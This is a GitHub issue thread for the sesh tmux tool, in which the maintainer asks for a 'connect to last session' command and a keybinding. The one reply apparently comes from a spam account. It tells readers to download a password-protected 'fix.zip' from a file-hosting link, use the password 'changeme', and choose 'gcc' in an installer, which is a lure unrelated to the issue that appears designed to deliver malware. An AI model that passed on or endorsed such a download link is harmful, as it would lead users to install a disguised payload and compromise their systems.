### ISSUE TITLE
Connect to last session

### ISSUE THREAD

**Issue by joshmedeski** [joshmedeski/sesh#152]
### What would you like sesh to do?

As a user, I want to connect to the last session, so I can more easily context switch.

- tmux by default doesn't know what the "last" session is if you disconnect from tmux
- `sesh connect --last`(or `sesh last`)
- Find a way to bind it to `cmd+l` inside and outside of tmux
- When I close a tmux session, I want to always connect to the last session (this behavior is inconsistent in tmux)

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
